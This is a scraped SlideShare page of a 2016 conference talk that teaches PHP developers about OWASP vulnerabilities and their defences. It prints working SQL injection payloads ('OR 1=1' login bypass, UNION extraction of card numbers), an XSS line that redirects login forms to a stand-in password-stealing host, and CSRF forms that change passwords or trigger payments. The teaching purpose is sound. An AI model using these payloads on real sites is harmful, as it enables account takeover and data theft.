Hacking Your Way to Better Security - ZendCon 2016

Colin O'Dell
Colin O'DellLead Web Developer for Unleashed Technologies at Unleashed Technologies
Hacking Your Way To Better Security
Colin O’Dell Lead Web Developer at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Migration Guide e-book author php[world] 2015 CtF winner @colinodell
Goals Explore several top security vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities @colinodell
Disclaimers 1.NEVER test systems that aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real. @colinodell
OWASP Top 10
OWASP Top 10 Regular publication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks @colinodell
Hacking Your Way to Better Security - ZendCon 2016
Hacking Your Way to Better Security - ZendCon 2016
SQL Injection Modifying SQL statements to: Spoof identity Tamper with data Disclose hidden information
SQL Injection Basics $value = $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
Username Password Log In admin password
Username Password Log In admin password' Invalid username or password. Please double-check and try again.
Username Password Log In admin Unknown error.
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $ ~~
Username Password Log In admin ' test Unknown error.
Username Password Log In admin Unknown error.
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
~~~~~~~~ SELECT * FROM users WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test
SELECT * FROM users WHERE username = 'admin' AND password = '' test '; SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test ~~~~~~~~~~~~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
SELECT * FROM users WHERE username = 'admin' AND password = '' '; SELECT * FROM users WHERE username = 'admin' AND password = '' '; ' ~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ' ' ~~~~~~~~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; ' OR '
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; ' OR '1 ' ~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; ' OR '1' ' ~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; ' OR '1'='
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1
Username Password Log In admin ' OR '1'='1 Unknown error.
Welcome Admin! Admin Menu: Give customer money Take money away Review credit card applications Close accounts
Blind SQL Injection
Blind SQL Injection Invalid username or password. Please double-check and try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result) @colinodell
' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Log In Real-Time MySQL View
' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Error LogQuery Log SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Invalid username or password. Please double-check and try again. Log In
SQL Injection - Data Disclosure
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 } @colinodell
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { } @colinodell
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 } @colinodell
SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION @colinodell
SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION @colinodell
SQL UNION Query Column 1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION @colinodell
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 } @colinodell
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 } @colinodell
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0 } @colinodell
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 } @colinodell
Protecting Against SQL Injection $value = $_REQUEST['value']; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
Protecting Against SQL Injection Block input with special characters
Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
Protecting Against SQL Injection Block input with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
Other Types of Injection NoSQL databases OS Commands LDAP Queries SMTP Headers @colinodell
XSS Cross-Site Scripting Injecting code into the webpage (for other users) • Execute malicious scripts • Hijack sessions • Install malware • Deface websites
XSS Attack Basics $value = $_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT value FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
XSS – Cross-Site Scripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> @colinodell
XSS – Cross-Site Scripting short.ly Paste a URL here Shorten @colinodell
XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten @colinodell
XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL: http://www.colinodell.com @colinodell
XSS – Cross-Site Scripting short.ly Please wait while we redirect you to http://www.colinodell.com @colinodell
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten @colinodell
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X @colinodell
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: @colinodell
<p> Short URL: <a href="…">http://short.ly/3bs8a</a> </p> <p> Original URL: <a href="…"><script>alert('hello world!');</script></a> </p>
XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten @colinodell
XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL: @colinodell
XSS – Cross-Site Scripting short.ly Please wait while we redirect you to @colinodell
XSS – Cross-Site Scripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php'; @colinodell
Protecting Against XSS Attacks $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
Protecting Against XSS Attacks • Filter user input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
Protecting Against XSS Attacks • Filter user input • Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> &lt;script&gt; htmlspecialchars()
Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output {{ some_variable }} {{ some_variable|raw }}
CSRF Cross-Site Request Forgery Execute unwanted actions on another site which user is logged in to. • Change password • Transfer funds • Anything the user can do
CSRF – Cross-Site Request Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. @colinodell
CSRF – Cross-Site Request Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> @colinodell
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> @colinodell
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. @colinodell
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done! @colinodell
CSRF – Cross-Site Request Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten @colinodell
CSRF – Cross-Site Request Forgery short.ly Please wait while we redirect you to X @colinodell
Protecting Against CSRF Attacks Only use POST requests?
Protecting Against CSRF Attacks Only use POST requests? NO! POST requests are vulnerable too Common Misconceptions: “<img> tags can only make GET requests” “If a user doesn’t click a form it won’t submit”
Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie?
Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? NO! Cookies are sent on every request.
Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? Use random CSRF tokens YES! <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
Insecure Direct Object References Access & manipulate objects you shouldn’t have access to
Insecure Direct Object References @colinodell
Insecure Direct Object References Beverly Cooper @colinodell
Insecure Direct Object References @colinodell
Insecure Direct Object References @colinodell
Insecure Direct Object References @colinodell
Insecure Direct Object References @colinodell
Protecting Against Insecure Direct Object References Check permission on data input • URL / route parameters • Form field inputs • Basically anything that’s an ID • If they don’t have permission, show a 403 (or 404) page
Protecting Against Insecure Direct Object References Check permission on data input Check permission on data output • Do they have permission to access this object? • Do they have permission to even know this exists? • This is not “security through obscurity”
Sensitive Data Exposure Security Misconfiguration Components with Known Vulnerabilities
http://www.example.com/CHANGELOG http://www.example.com/composer.lock http://www.example.com/.git/ http://www.example.com/.env http://www.example.com/robots.txt Sensitive Data Exposure @colinodell
Sensitive Data Exposure - CHANGELOG @colinodell
Sensitive Data Exposure – composer.lock @colinodell
Sensitive Data Exposure – composer.lock @colinodell
Sensitive Data Exposure – .git @colinodell
Sensitive Data Exposure – robots.txt @colinodell
Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption) • Customer information • Credit card numbers • Credentials Sensitive Data Exposure @colinodell
Security Misconfiguration & Components with Known Vulnerabilities Default accounts enabled; weak passwords • admin / admin Security configuration • Does SSH grant root access? • Are weak encryption keys used? Out-of-date software • Old versions with known issues • Are the versions exposed? • Unused software running (DROWN attack) @colinodell
Components with Known Vulnerabilities @colinodell
Components with Known Vulnerabilities @colinodell
Components with Known Vulnerabilities @colinodell
Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date • Install critical updates immediately • Install other updates regularly
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root • Files which provide version numbers • README, CHANGELOG, .git, composer.lock • Database credentials & API keys • Encryption keys
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption • Encrypt with a strong private key • Encrypt backups and data-in-transit • Use strong hashing techniques for passwords
Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems • Scan your systems with automated tools • Test critical components yourself • Automated tests • Manual tests
Next Steps Test your own applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed @colinodell
Questions?
Thanks! Slides & feedback: https://joind.in/talk/11f91 Colin O'Dell @colinodell
Hacking Your Way to Better Security - ZendCon 2016
1 of 118

Hacking Your Way to Better Security - ZendCon 2016

Download to read offline
Software

This talk educates developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, and others. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. We'll then apply this knowledge to see how web applications can be secured against such vulnerabilities.

Colin O'Dell
Colin O'DellLead Web Developer for Unleashed Technologies at Unleashed Technologies

Recommended

Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
855 views117 slides
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
959 views109 slides
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better SecurityColin O'Dell
762 views109 slides
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
533 views149 slides
Hacking Your Way To Better Security - Dutch PHP Conference 2016Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Colin O'Dell
863 views109 slides
Propel sfugmdPropel sfugmd
Propel sfugmdiKlaus
464 views22 slides

More Related Content

What's hot

UITableView Pain PointsUITableView Pain Points
UITableView Pain PointsKen Auer
648 views76 slides
Daily notesDaily notes
Daily notesmeghendra168
884 views46 slides

What's hot(20)

UITableView Pain PointsUITableView Pain Points
UITableView Pain Points
Ken Auer648 views
Introduction to Active Record - Silicon Valley Ruby Conference 2007Introduction to Active Record - Silicon Valley Ruby Conference 2007
Introduction to Active Record - Silicon Valley Ruby Conference 2007
Rabble .18K views
Dig Deeper into WordPress - WD Meetup CairoDig Deeper into WordPress - WD Meetup Cairo
Dig Deeper into WordPress - WD Meetup Cairo
Mohamed Mosaad934 views
Introduction à CoffeeScript pour ParisRB Introduction à CoffeeScript pour ParisRB
Introduction à CoffeeScript pour ParisRB
jhchabran1.4K views
jQuery PresentasionjQuery Presentasion
jQuery Presentasion
Mohammad Usman328 views
Daily notesDaily notes
Daily notes
meghendra168884 views
Php My SqlPhp My Sql
Php My Sql
mussawir202.1K views
jQuery from the very beginningjQuery from the very beginning
jQuery from the very beginning
Anis Ahmad11.8K views
Add edit delete in Codeigniter in PHPAdd edit delete in Codeigniter in PHP
Add edit delete in Codeigniter in PHP
Vineet Kumar Saini14.8K views
jQuery FundamentalsjQuery Fundamentals
jQuery Fundamentals
Gil Fink5.4K views
Pagination in PHPPagination in PHP
Pagination in PHP
Vineet Kumar Saini2.5K views
Country State City Dropdown in PHPCountry State City Dropdown in PHP
Country State City Dropdown in PHP
Vineet Kumar Saini30.5K views
Jquery introductionJquery introduction
Jquery introduction
musrath mohammad492 views
Your code sucks, let's fix it - DPC UnConYour code sucks, let's fix it - DPC UnCon
Your code sucks, let's fix it - DPC UnCon
Rafael Dohms32.5K views
Learning jQuery in 30 minutesLearning jQuery in 30 minutes
Learning jQuery in 30 minutes
Simon Willison53.4K views
JqueryJquery
Jquery
Girish Srivastava5.2K views
Prototype & jQueryPrototype & jQuery
Prototype & jQuery
Remy Sharp37K views
Separation of concerns - DPC12Separation of concerns - DPC12
Separation of concerns - DPC12
Stephan Hochdörfer2.3K views
J query trainingJ query training
J query training
FIS - Fidelity Information Services429 views
jQueryjQuery
jQuery
Mostafa Bayomi9.5K views

Viewers also liked

UtplUtpl
UtplCrupzkaya
102 views2 slides
Telecom lect 3Telecom lect 3
Telecom lect 3Shiraz316
185 views30 slides

Viewers also liked(20)

UtplUtpl
Utpl
Crupzkaya102 views
Telecom lect 3Telecom lect 3
Telecom lect 3
Shiraz316185 views
Percona XtraDB Cluster - Small PresentationPercona XtraDB Cluster - Small Presentation
Percona XtraDB Cluster - Small Presentation
Javier Tomas Zon730 views
Milagros de jesusMilagros de jesus
Milagros de jesus
MIRYAM LUISA CABRERA CANELO3.2K views
01- instalacion de laravel 5+ (dos formas sencillas )01- instalacion de laravel 5+ (dos formas sencillas )
01- instalacion de laravel 5+ (dos formas sencillas )
Jairo Hoyos1.1K views
Delph v29 1 - DELPH SonarDelph v29 1 - DELPH Sonar
Delph v29 1 - DELPH Sonar
IXSEA-DELPH3.8K views
TDC SP 2015 - PHP7: better & fasterTDC SP 2015 - PHP7: better & faster
TDC SP 2015 - PHP7: better & faster
Bruno Ricardo Siqueira880 views
Npm node.js的套件管理程式Npm node.js的套件管理程式
Npm node.js的套件管理程式
Chuyi Huang333 views
High Performance Solution for PHP7High Performance Solution for PHP7
High Performance Solution for PHP7
Xinchen Hui3.3K views
(Infographic) Anatomy of a 70:20:10 Moodle Course(Infographic) Anatomy of a 70:20:10 Moodle Course
(Infographic) Anatomy of a 70:20:10 Moodle Course
LEO878 views
NPM THE GUIDENPM THE GUIDE
NPM THE GUIDE
Kameron Tanseli1.7K views
Web crawlers with reinforcement learningWeb crawlers with reinforcement learning
Web crawlers with reinforcement learning
Mohammed Ashour788 views
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP5.9K views
Introduction to NPM and building CLI Tools with Node.jsIntroduction to NPM and building CLI Tools with Node.js
Introduction to NPM and building CLI Tools with Node.js
Suroor Wijdan3K views
PHP 7 - Above and BeyondPHP 7 - Above and Beyond
PHP 7 - Above and Beyond
rafaelfqf567 views
Delph v29 0 - General PresentationDelph v29 0 - General Presentation
Delph v29 0 - General Presentation
IXSEA-DELPH3.7K views
Php vs aspPhp vs asp
Php vs asp
umesh patil523 views
A History of PHPA History of PHP
A History of PHP
Xinchen Hui3.2K views
Haarlem bakermat van de kunst - Bijeenkomst VI - Stillevens, deel IHaarlem bakermat van de kunst - Bijeenkomst VI - Stillevens, deel I
Haarlem bakermat van de kunst - Bijeenkomst VI - Stillevens, deel I
Michiel C.C. Kersten1.9K views
PHP7 - The New Engine for old good trainPHP7 - The New Engine for old good train
PHP7 - The New Engine for old good train
Xinchen Hui32.6K views

Similar to Hacking Your Way to Better Security - ZendCon 2016

SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
5.2K views11 slides

Similar to Hacking Your Way to Better Security - ZendCon 2016(20)

My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden172 views
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden1.8K views
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
Andrea Valenza154 views
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)
Ömer Çıtak289 views
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross5.2K views
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
Pradeep Kumar7K views
2014 database - course 3 - PHP and MySQL2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL
Hung-yu Lin2.5K views
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden725 views
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden1.1K views
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
Jeff Prom378 views
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC115.2K views
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden1.6K views
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden706 views
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()
Craig Francis45 views
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden585 views
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden642 views
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
Compare Infobase Limited2.7K views
Building Your First WidgetBuilding Your First Widget
Building Your First Widget
Chris Wilcoxson2.5K views
PHPUnit Episode iv.iii: Return of the testsPHPUnit Episode iv.iii: Return of the tests
PHPUnit Episode iv.iii: Return of the tests
Michelangelo van Dam872 views
Building Better Applications with Data::ManagerBuilding Better Applications with Data::Manager
Building Better Applications with Data::Manager
Jay Shirley1.7K views

More from Colin O'Dell

More from Colin O'Dell(20)

Demystifying Unicode - Longhorn PHP 2021Demystifying Unicode - Longhorn PHP 2021
Demystifying Unicode - Longhorn PHP 2021
Colin O'Dell263 views
Releasing High Quality Packages - Longhorn PHP 2021Releasing High Quality Packages - Longhorn PHP 2021
Releasing High Quality Packages - Longhorn PHP 2021
Colin O'Dell168 views
Releasing High Quality PHP Packages - ConFoo Montreal 2019Releasing High Quality PHP Packages - ConFoo Montreal 2019
Releasing High Quality PHP Packages - ConFoo Montreal 2019
Colin O'Dell625 views
Debugging Effectively - ConFoo Montreal 2019Debugging Effectively - ConFoo Montreal 2019
Debugging Effectively - ConFoo Montreal 2019
Colin O'Dell499 views
Automating Deployments with Deployer - php[world] 2018Automating Deployments with Deployer - php[world] 2018
Automating Deployments with Deployer - php[world] 2018
Colin O'Dell468 views
Releasing High-Quality Packages - php[world] 2018Releasing High-Quality Packages - php[world] 2018
Releasing High-Quality Packages - php[world] 2018
Colin O'Dell326 views
Debugging Effectively - DrupalCon Nashville 2018Debugging Effectively - DrupalCon Nashville 2018
Debugging Effectively - DrupalCon Nashville 2018
Colin O'Dell830 views
CommonMark: Markdown Done Right - ZendCon 2017CommonMark: Markdown Done Right - ZendCon 2017
CommonMark: Markdown Done Right - ZendCon 2017
Colin O'Dell1.4K views
Rise of the Machines: PHP and IoT - ZendCon 2017Rise of the Machines: PHP and IoT - ZendCon 2017
Rise of the Machines: PHP and IoT - ZendCon 2017
Colin O'Dell2.3K views
Debugging Effectively - All Things Open 2017Debugging Effectively - All Things Open 2017
Debugging Effectively - All Things Open 2017
Colin O'Dell1.1K views
Hacking Your Way To Better Security - DrupalCon Baltimore 2017Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Colin O'Dell1.4K views
Debugging Effectively - PHP UK 2017Debugging Effectively - PHP UK 2017
Debugging Effectively - PHP UK 2017
Colin O'Dell1.7K views
Debugging Effectively - SunshinePHP 2017Debugging Effectively - SunshinePHP 2017
Debugging Effectively - SunshinePHP 2017
Colin O'Dell432 views
Automating Your Workflow with Gulp.js - php[world] 2016Automating Your Workflow with Gulp.js - php[world] 2016
Automating Your Workflow with Gulp.js - php[world] 2016
Colin O'Dell1.3K views
Rise of the Machines: PHP and IoT - php[world] 2016Rise of the Machines: PHP and IoT - php[world] 2016
Rise of the Machines: PHP and IoT - php[world] 2016
Colin O'Dell1.6K views
Debugging Effectively - ZendCon 2016Debugging Effectively - ZendCon 2016
Debugging Effectively - ZendCon 2016
Colin O'Dell520 views
Debugging Effectively - DrupalCon Europe 2016Debugging Effectively - DrupalCon Europe 2016
Debugging Effectively - DrupalCon Europe 2016
Colin O'Dell544 views
CommonMark: Markdown done right - Nomad PHP September 2016CommonMark: Markdown done right - Nomad PHP September 2016
CommonMark: Markdown done right - Nomad PHP September 2016
Colin O'Dell1.1K views
Debugging Effectively - Frederick Web Tech 9/6/16Debugging Effectively - Frederick Web Tech 9/6/16
Debugging Effectively - Frederick Web Tech 9/6/16
Colin O'Dell604 views
Debugging EffectivelyDebugging Effectively
Debugging Effectively
Colin O'Dell1.7K views

Recently uploaded

Recently uploaded(20)

DSD-INT 2023 SFINCS Modelling in the U.S. Pacific Northwest - ParkerDSD-INT 2023 SFINCS Modelling in the U.S. Pacific Northwest - Parker
DSD-INT 2023 SFINCS Modelling in the U.S. Pacific Northwest - Parker
Deltares7 views
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...
marksimpsongw74 views
Neo4j : Graphes de Connaissance, IA et LLMsNeo4j : Graphes de Connaissance, IA et LLMs
Neo4j : Graphes de Connaissance, IA et LLMs
Neo4j42 views
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - GeertsemaDSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
Deltares5 views
Why Cloud Services.pdfWhy Cloud Services.pdf
Why Cloud Services.pdf
Pi DATACENTERS6 views
